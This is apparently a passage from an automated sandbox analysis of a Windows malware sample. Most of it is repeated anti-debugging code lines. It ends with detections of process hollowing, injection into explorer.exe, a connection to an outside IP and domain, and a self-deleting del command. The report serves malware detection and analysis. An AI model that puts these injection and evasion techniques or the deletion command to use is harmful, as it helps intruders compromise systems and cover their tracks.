          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016CC182 mov eax, dword ptr fs:[00000030h]11_2_016CC182
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01771074 mov eax, dword ptr fs:[00000030h]11_2_01771074
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01762073 mov eax, dword ptr fs:[00000030h]11_2_01762073
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016C0050 mov eax, dword ptr fs:[00000030h]11_2_016C0050
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016C0050 mov eax, dword ptr fs:[00000030h]11_2_016C0050
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016BB02A mov eax, dword ptr fs:[00000030h]11_2_016BB02A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016BB02A mov eax, dword ptr fs:[00000030h]11_2_016BB02A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016BB02A mov eax, dword ptr fs:[00000030h]11_2_016BB02A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016BB02A mov eax, dword ptr fs:[00000030h]11_2_016BB02A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01774015 mov eax, dword ptr fs:[00000030h]11_2_01774015
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01774015 mov eax, dword ptr fs:[00000030h]11_2_01774015
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01727016 mov eax, dword ptr fs:[00000030h]11_2_01727016
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01727016 mov eax, dword ptr fs:[00000030h]11_2_01727016
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01727016 mov eax, dword ptr fs:[00000030h]11_2_01727016
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0173B8D0 mov eax, dword ptr fs:[00000030h]11_2_0173B8D0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0173B8D0 mov ecx, dword ptr fs:[00000030h]11_2_0173B8D0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0173B8D0 mov eax, dword ptr fs:[00000030h]11_2_0173B8D0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0173B8D0 mov eax, dword ptr fs:[00000030h]11_2_0173B8D0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0173B8D0 mov eax, dword ptr fs:[00000030h]11_2_0173B8D0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0173B8D0 mov eax, dword ptr fs:[00000030h]11_2_0173B8D0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E90AF mov eax, dword ptr fs:[00000030h]11_2_016E90AF
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016DF0BF mov ecx, dword ptr fs:[00000030h]11_2_016DF0BF
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016DF0BF mov eax, dword ptr fs:[00000030h]11_2_016DF0BF
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016DF0BF mov eax, dword ptr fs:[00000030h]11_2_016DF0BF
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A9080 mov eax, dword ptr fs:[00000030h]11_2_016A9080
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01723884 mov eax, dword ptr fs:[00000030h]11_2_01723884
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01723884 mov eax, dword ptr fs:[00000030h]11_2_01723884
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016ADB60 mov ecx, dword ptr fs:[00000030h]11_2_016ADB60
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D3B7A mov eax, dword ptr fs:[00000030h]11_2_016D3B7A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D3B7A mov eax, dword ptr fs:[00000030h]11_2_016D3B7A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016ADB40 mov eax, dword ptr fs:[00000030h]11_2_016ADB40
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01778B58 mov eax, dword ptr fs:[00000030h]11_2_01778B58
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016AF358 mov eax, dword ptr fs:[00000030h]11_2_016AF358
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0176131B mov eax, dword ptr fs:[00000030h]11_2_0176131B
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D03E2 mov eax, dword ptr fs:[00000030h]11_2_016D03E2
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D03E2 mov eax, dword ptr fs:[00000030h]11_2_016D03E2
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D03E2 mov eax, dword ptr fs:[00000030h]11_2_016D03E2
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D03E2 mov eax, dword ptr fs:[00000030h]11_2_016D03E2
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D03E2 mov eax, dword ptr fs:[00000030h]11_2_016D03E2
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D03E2 mov eax, dword ptr fs:[00000030h]11_2_016D03E2
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01775BA5 mov eax, dword ptr fs:[00000030h]11_2_01775BA5
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B1B8F mov eax, dword ptr fs:[00000030h]11_2_016B1B8F
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B1B8F mov eax, dword ptr fs:[00000030h]11_2_016B1B8F
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0175D380 mov ecx, dword ptr fs:[00000030h]11_2_0175D380
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0176138A mov eax, dword ptr fs:[00000030h]11_2_0176138A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016DB390 mov eax, dword ptr fs:[00000030h]11_2_016DB390
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E927A mov eax, dword ptr fs:[00000030h]11_2_016E927A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0175B260 mov eax, dword ptr fs:[00000030h]11_2_0175B260
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0175B260 mov eax, dword ptr fs:[00000030h]11_2_0175B260
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01778A62 mov eax, dword ptr fs:[00000030h]11_2_01778A62
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01734257 mov eax, dword ptr fs:[00000030h]11_2_01734257
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A9240 mov eax, dword ptr fs:[00000030h]11_2_016A9240
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A9240 mov eax, dword ptr fs:[00000030h]11_2_016A9240
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A9240 mov eax, dword ptr fs:[00000030h]11_2_016A9240
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A9240 mov eax, dword ptr fs:[00000030h]11_2_016A9240
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B8A0A mov eax, dword ptr fs:[00000030h]11_2_016B8A0A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016C3A1C mov eax, dword ptr fs:[00000030h]11_2_016C3A1C
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A52A5 mov eax, dword ptr fs:[00000030h]11_2_016A52A5
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A52A5 mov eax, dword ptr fs:[00000030h]11_2_016A52A5
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A52A5 mov eax, dword ptr fs:[00000030h]11_2_016A52A5
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A52A5 mov eax, dword ptr fs:[00000030h]11_2_016A52A5
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A52A5 mov eax, dword ptr fs:[00000030h]11_2_016A52A5
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016BAAB0 mov eax, dword ptr fs:[00000030h]11_2_016BAAB0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016BAAB0 mov eax, dword ptr fs:[00000030h]11_2_016BAAB0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016DFAB0 mov eax, dword ptr fs:[00000030h]11_2_016DFAB0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016DD294 mov eax, dword ptr fs:[00000030h]11_2_016DD294
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016DD294 mov eax, dword ptr fs:[00000030h]11_2_016DD294
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016CC577 mov eax, dword ptr fs:[00000030h]11_2_016CC577
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016CC577 mov eax, dword ptr fs:[00000030h]11_2_016CC577
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E3D43 mov eax, dword ptr fs:[00000030h]11_2_016E3D43
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01723540 mov eax, dword ptr fs:[00000030h]11_2_01723540
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016C7D50 mov eax, dword ptr fs:[00000030h]11_2_016C7D50
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01778D34 mov eax, dword ptr fs:[00000030h]11_2_01778D34
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0172A537 mov eax, dword ptr fs:[00000030h]11_2_0172A537
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D4D3B mov eax, dword ptr fs:[00000030h]11_2_016D4D3B
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D4D3B mov eax, dword ptr fs:[00000030h]11_2_016D4D3B
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D4D3B mov eax, dword ptr fs:[00000030h]11_2_016D4D3B
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016AAD30 mov eax, dword ptr fs:[00000030h]11_2_016AAD30
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B3D34 mov eax, dword ptr fs:[00000030h]11_2_016B3D34
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B3D34 mov eax, dword ptr fs:[00000030h]11_2_016B3D34
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B3D34 mov eax, dword ptr fs:[00000030h]11_2_016B3D34
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B3D34 mov eax, dword ptr fs:[00000030h]11_2_016B3D34
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B3D34 mov eax, dword ptr fs:[00000030h]11_2_016B3D34
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B3D34 mov eax, dword ptr fs:[00000030h]11_2_016B3D34
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B3D34 mov eax, dword ptr fs:[00000030h]11_2_016B3D34
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B3D34 mov eax, dword ptr fs:[00000030h]11_2_016B3D34
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B3D34 mov eax, dword ptr fs:[00000030h]11_2_016B3D34
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B3D34 mov eax, dword ptr fs:[00000030h]11_2_016B3D34
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B3D34 mov eax, dword ptr fs:[00000030h]11_2_016B3D34
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B3D34 mov eax, dword ptr fs:[00000030h]11_2_016B3D34
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B3D34 mov eax, dword ptr fs:[00000030h]11_2_016B3D34
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01758DF1 mov eax, dword ptr fs:[00000030h]11_2_01758DF1
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016BD5E0 mov eax, dword ptr fs:[00000030h]11_2_016BD5E0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016BD5E0 mov eax, dword ptr fs:[00000030h]11_2_016BD5E0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D35A1 mov eax, dword ptr fs:[00000030h]11_2_016D35A1
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D1DB5 mov eax, dword ptr fs:[00000030h]11_2_016D1DB5
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D1DB5 mov eax, dword ptr fs:[00000030h]11_2_016D1DB5
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D1DB5 mov eax, dword ptr fs:[00000030h]11_2_016D1DB5
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A2D8A mov eax, dword ptr fs:[00000030h]11_2_016A2D8A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A2D8A mov eax, dword ptr fs:[00000030h]11_2_016A2D8A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A2D8A mov eax, dword ptr fs:[00000030h]11_2_016A2D8A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A2D8A mov eax, dword ptr fs:[00000030h]11_2_016A2D8A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A2D8A mov eax, dword ptr fs:[00000030h]11_2_016A2D8A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016DFD9B mov eax, dword ptr fs:[00000030h]11_2_016DFD9B
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016DFD9B mov eax, dword ptr fs:[00000030h]11_2_016DFD9B
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016C746D mov eax, dword ptr fs:[00000030h]11_2_016C746D
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0173C450 mov eax, dword ptr fs:[00000030h]11_2_0173C450
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0173C450 mov eax, dword ptr fs:[00000030h]11_2_0173C450
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016DA44B mov eax, dword ptr fs:[00000030h]11_2_016DA44B
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016DBC2C mov eax, dword ptr fs:[00000030h]11_2_016DBC2C
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01761C06 mov eax, dword ptr fs:[00000030h]11_2_01761C06
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01761C06 mov eax, dword ptr fs:[00000030h]11_2_01761C06
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01761C06 mov eax, dword ptr fs:[00000030h]11_2_01761C06
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01761C06 mov eax, dword ptr fs:[00000030h]11_2_01761C06
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01761C06 mov eax, dword ptr fs:[00000030h]11_2_01761C06
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01761C06 mov eax, dword ptr fs:[00000030h]11_2_01761C06
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01761C06 mov eax, dword ptr fs:[00000030h]11_2_01761C06
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01761C06 mov eax, dword ptr fs:[00000030h]11_2_01761C06
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01761C06 mov eax, dword ptr fs:[00000030h]11_2_01761C06
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01761C06 mov eax, dword ptr fs:[00000030h]11_2_01761C06
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01761C06 mov eax, dword ptr fs:[00000030h]11_2_01761C06
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01761C06 mov eax, dword ptr fs:[00000030h]11_2_01761C06
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01761C06 mov eax, dword ptr fs:[00000030h]11_2_01761C06
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01761C06 mov eax, dword ptr fs:[00000030h]11_2_01761C06
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01726C0A mov eax, dword ptr fs:[00000030h]11_2_01726C0A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01726C0A mov eax, dword ptr fs:[00000030h]11_2_01726C0A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01726C0A mov eax, dword ptr fs:[00000030h]11_2_01726C0A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01726C0A mov eax, dword ptr fs:[00000030h]11_2_01726C0A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0177740D mov eax, dword ptr fs:[00000030h]11_2_0177740D
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0177740D mov eax, dword ptr fs:[00000030h]11_2_0177740D
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0177740D mov eax, dword ptr fs:[00000030h]11_2_0177740D
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01726CF0 mov eax, dword ptr fs:[00000030h]11_2_01726CF0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01726CF0 mov eax, dword ptr fs:[00000030h]11_2_01726CF0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01726CF0 mov eax, dword ptr fs:[00000030h]11_2_01726CF0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_017614FB mov eax, dword ptr fs:[00000030h]11_2_017614FB
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01778CD6 mov eax, dword ptr fs:[00000030h]11_2_01778CD6
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B849B mov eax, dword ptr fs:[00000030h]11_2_016B849B
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016BFF60 mov eax, dword ptr fs:[00000030h]11_2_016BFF60
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01778F6A mov eax, dword ptr fs:[00000030h]11_2_01778F6A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016BEF40 mov eax, dword ptr fs:[00000030h]11_2_016BEF40
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A4F2E mov eax, dword ptr fs:[00000030h]11_2_016A4F2E
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A4F2E mov eax, dword ptr fs:[00000030h]11_2_016A4F2E
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016DE730 mov eax, dword ptr fs:[00000030h]11_2_016DE730
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0173FF10 mov eax, dword ptr fs:[00000030h]11_2_0173FF10
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0173FF10 mov eax, dword ptr fs:[00000030h]11_2_0173FF10
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016DA70E mov eax, dword ptr fs:[00000030h]11_2_016DA70E
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016DA70E mov eax, dword ptr fs:[00000030h]11_2_016DA70E
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0177070D mov eax, dword ptr fs:[00000030h]11_2_0177070D
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0177070D mov eax, dword ptr fs:[00000030h]11_2_0177070D
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016CF716 mov eax, dword ptr fs:[00000030h]11_2_016CF716
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E37F5 mov eax, dword ptr fs:[00000030h]11_2_016E37F5
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01727794 mov eax, dword ptr fs:[00000030h]11_2_01727794
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01727794 mov eax, dword ptr fs:[00000030h]11_2_01727794
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01727794 mov eax, dword ptr fs:[00000030h]11_2_01727794
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B8794 mov eax, dword ptr fs:[00000030h]11_2_016B8794
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B766D mov eax, dword ptr fs:[00000030h]11_2_016B766D
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016CAE73 mov eax, dword ptr fs:[00000030h]11_2_016CAE73
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016CAE73 mov eax, dword ptr fs:[00000030h]11_2_016CAE73
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016CAE73 mov eax, dword ptr fs:[00000030h]11_2_016CAE73
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016CAE73 mov eax, dword ptr fs:[00000030h]11_2_016CAE73
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016CAE73 mov eax, dword ptr fs:[00000030h]11_2_016CAE73
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B7E41 mov eax, dword ptr fs:[00000030h]11_2_016B7E41
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B7E41 mov eax, dword ptr fs:[00000030h]11_2_016B7E41
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B7E41 mov eax, dword ptr fs:[00000030h]11_2_016B7E41
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B7E41 mov eax, dword ptr fs:[00000030h]11_2_016B7E41
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B7E41 mov eax, dword ptr fs:[00000030h]11_2_016B7E41
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B7E41 mov eax, dword ptr fs:[00000030h]11_2_016B7E41
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0175FE3F mov eax, dword ptr fs:[00000030h]11_2_0175FE3F
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016AE620 mov eax, dword ptr fs:[00000030h]11_2_016AE620
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016AC600 mov eax, dword ptr fs:[00000030h]11_2_016AC600
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016AC600 mov eax, dword ptr fs:[00000030h]11_2_016AC600
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016AC600 mov eax, dword ptr fs:[00000030h]11_2_016AC600
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D8E00 mov eax, dword ptr fs:[00000030h]11_2_016D8E00
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016DA61C mov eax, dword ptr fs:[00000030h]11_2_016DA61C
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016DA61C mov eax, dword ptr fs:[00000030h]11_2_016DA61C
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016B76E2 mov eax, dword ptr fs:[00000030h]11_2_016B76E2
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D16E0 mov ecx, dword ptr fs:[00000030h]11_2_016D16E0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01778ED6 mov eax, dword ptr fs:[00000030h]11_2_01778ED6
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D36CC mov eax, dword ptr fs:[00000030h]11_2_016D36CC
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E8EC7 mov eax, dword ptr fs:[00000030h]11_2_016E8EC7
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0175FEC0 mov eax, dword ptr fs:[00000030h]11_2_0175FEC0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01770EA5 mov eax, dword ptr fs:[00000030h]11_2_01770EA5
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01770EA5 mov eax, dword ptr fs:[00000030h]11_2_01770EA5
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_01770EA5 mov eax, dword ptr fs:[00000030h]11_2_01770EA5
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_017246A7 mov eax, dword ptr fs:[00000030h]11_2_017246A7
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0173FE87 mov eax, dword ptr fs:[00000030h]11_2_0173FE87
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0040ACF0 LdrLoadDll,11_2_0040ACF0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 66.235.200.145 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.adornmentwithadrienne.com
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeSection unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: 1210000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeMemory written: C:\Users\user\Desktop\ClbrTLBbVA.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeThread register set: target process: 3452Jump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeThread register set: target process: 3452Jump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess created: C:\Users\user\Desktop\ClbrTLBbVA.exe {path}Jump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess created: C:\Users\user\Desktop\ClbrTLBbVA.exe {path}Jump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\ClbrTLBbVA.exe"Jump to behavior
